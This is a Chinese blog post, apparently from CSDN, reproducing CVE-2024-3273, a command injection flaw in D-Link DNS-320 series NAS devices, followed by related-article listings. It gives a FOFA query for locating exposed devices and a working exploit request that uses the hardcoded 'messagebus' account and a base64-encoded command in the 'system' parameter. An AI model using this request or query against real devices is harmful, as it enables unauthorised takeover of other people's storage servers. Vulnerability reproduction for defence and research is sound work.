【漏洞复现】D-Link nas_sharing.cgi 远程代码执行漏洞(CVE-2024-3273)

最新推荐文章于 2024-09-29 23:30:47 发布
最新推荐文章于 2024-09-29 23:30:47 发布
阅读量457 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/137559650
版权
本文详细介绍了D-Link DNS-320 NAS设备上的nas_sharing.cgi漏洞,该漏洞允许未授权攻击者通过命令注入实现远程代码执行,从而控制服务器。内容包括产品简介、漏洞概述、测绘语句、漏洞复现步骤、影响范围以及免责声明。
摘要由CSDN通过智能技术生成

0x01 产品简介

D-Link DNS-320是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。

0x02 漏洞概述

D-Link DNS-320L存在命令注入漏洞,未授权的攻击者可以通过该漏洞进行远程代码执行,从而控制服务器。

0x03 测绘语句

fofa:body="Text:In order to access the ShareCenter"

0x04 漏洞复现

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1

了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
专栏目录
订阅专栏
D-Link NAS 未授权RCE漏洞复现(CVE-2024-3273)
0xSec
04-09 1082
D-Link NAS nas_sharing.cgi接口存在命令执行漏洞,该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中,影响其 HTTP GET 请求处理程序组件。漏洞成因是通过硬编码帐户(用户名:“messagebus”和空密码)造成的后门以及通过“system”参数的命令注入问题。未经身份验证的攻击者可利用此漏洞获取服务器权限。
漏洞复现】D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞CVE-2024-3273
失心少年
04-18 236
D-Link DNS-320是中国友讯(D-Link)公司的一款NAS网络附属存储)设备。D-Link DNS-320L存在命令注入漏洞,该漏洞源于文件/cgi-bin/nas_sharing.cgi存在命令注入漏洞。受影响的产品和版本:D-Link DNS-320L,DNS-325,DNS-327,DNS-340L,D-Link NAS Storage。受影响的产品和版本:D-Link DNS-320L,DNS-325,DNS-327,DNS-340L,D-Link NAS Storage。
D-Link设备远程命令执行漏洞(CVE-2024-3273)
qq_69775412的博客
04-30 447
D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞
[漏洞复现]D-Link未授权RCE漏洞复现(CVE-2024-3273)
KKleeeaa的博客
04-11 725
声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。如有侵权,请立即告知,我们将立即删除并致歉。D-Link nas_sharing.cgi接口存在命令执行漏洞,该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中,漏洞成因是通过硬编码帐户造成的后门以及通过“system”参数的命令注入问题。未经身份验证的攻击者可利用此漏洞获取服务器权限。0x02FOFA测绘。
D-LinkNAS 远程命令执行漏洞CVE-2024-3273)RCE漏
wan___she__pi的博客
04-12 944
D-LinkNAS是由D-Link公司制造的网络附加存储设备。D-Link是一家专注于网络和连接解决方案的公司。网络附加存储(NAS)设备是专用的文件存储系统,可以连接到计算机网络,允许多个用户和设备从集中位置访问和共享文件。aWQ=是id经过base64编码。
海洋CMS admin_notify.php 远程代码执行漏洞复现(CVE-2024-30565)
0xSec
06-12 1171
海洋CMS admin_notify.php 接口处存在远程代码执行漏洞,经过身份验证的远程攻击者可利用该漏洞执行任意代码,写入后门文件,进而控制整个web服务器。
漏洞复现CVE-2024-4577|PHP CGI Windows平台远程代码执行漏洞
信安百科
06-09 1574
漏洞复现CVE-2024-4577|PHP CGI Windows平台远程代码执行漏洞
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
0xSec
06-08 3145
2024年6月,PHP官方发布新版本,修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取操作系统权限,建议所有使用受影响版本的企业尽快升级修复,以确保安全。
D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞复现CVE-2019-16057)
Li-D的博客
01-24 734
D-Link DNS-320 到 2.05.B10 中的 login_mgr.cgi 容易受到远程命令注入的影响。
个人计算机与网络的安全
nn_84的博客
09-24 433
关于 wifi 大家都知道 wifi 已经使用了 wpa3 非常安全 但很多人不知道 pin 和 wps 这两项有漏洞。种漏洞来控制用户电脑 老实说吧 默认用户仍然是管理员 像windows 是很容易得到最高权限的。关于 病毒 大家都知道中国 美国 俄罗斯 的黑客不断的在对抗 所以这病毒花样百出 所以系统用户。关于 国产的 linux 老实说全是漏洞 默认开启 很多服务 但初始化的设置都有漏洞。我发现很多用户都简单设置了这两项 他们的设置 使他们的网络出现了漏洞
【计算机网络 - 基础问题】每日 3 题(二十一)
Newin2020的博客
09-24 780
✍个人博客:Pandaconda-CSDN博客📣专栏地址:http://t.csdnimg.cn/fYaBd📚专栏简介:在这个专栏中,我将会分享 C++ 面试中常见的面试题给大家~📝推荐参考地址:https://www.xiaolincoding.com/(这个大佬的专栏非常有用!
信息安全对抗演习:应对网络威胁的坚实防线
dexun123的博客
09-29 625
演习结束后,需要对整个演习过程进行总结和评估。分析演习中发现的问题和不足并提出改进措施;同时总结经验教训为未来的演习提供参考。
网络层——IP
weixin_74269833的博客
09-28 1109
由32位二进制数组成,通常用点分的形式被分为四个部分,每个部分1byte,最大值为255。从功能的角度看,ip地址由两部分组成,网络号和主机号。网络号标识了ip所在的网段,主机号标识了在该网段中的唯一的一台主机。二者的区分又需要与掩码配合使用,例如192.168.1.2/24,24表示掩码255.255.255.0,将掩码与ip进行按位与操作,获得了192.168.1.0即为该主机所在网段。将IP地址中的主机地址全部设为0, 就成为了网络号, 代表这个局域网。
2024ICPC网络赛2记录:CK
zsyzClb的博客
09-25 342
不过看到异或就知道这个异或肯定不是白给你的,大概就是用字典树,一开始我以为是把两个数组分开建字典树,后面发现要一起建,然后就想到用dp来维护。这一把我们三个人手感都很好,前六题都是一遍过,然后我又切掉了非签到的E和C,最后时间不是很多,K只想到大概字典树的思路,细节不是很懂就直接开冲,当然是没有冲出来。我们想了很多错误的思路以后才开始思考kmp,然后就想到了可以一直跳kmp,只需要把相同的合并起来,如果能匹配的就全部一起跳过,不匹配的就直接删掉,时间复杂度O(n)。看上去要求某种匹配数的个数,有点吓人。
通信工程学习:什么是LAN局域网、MAN城域网、WAN广域网
最新发布
limengshi138392的博客
09-29 519
通信工程学习:什么是LAN局域网、MAN城域网、WAN广域网
QEMU 用户网络与桥接网络设置总结
aspirestro三水问海的博客
09-28 396
QEMU 用户网络与桥接网络设置总结
如何检测CVE-2024-38077漏洞:Windows远程代码执行
CVE-2024-38077是一个特定的安全漏洞标识,它指的是在Windows远程桌面授权服务中发现的远程代码执行漏洞。此类漏洞允许攻击者通过远程桌面协议(RDP)在目标系统上执行任意代码。这种安全漏洞的严重性很高,因为攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值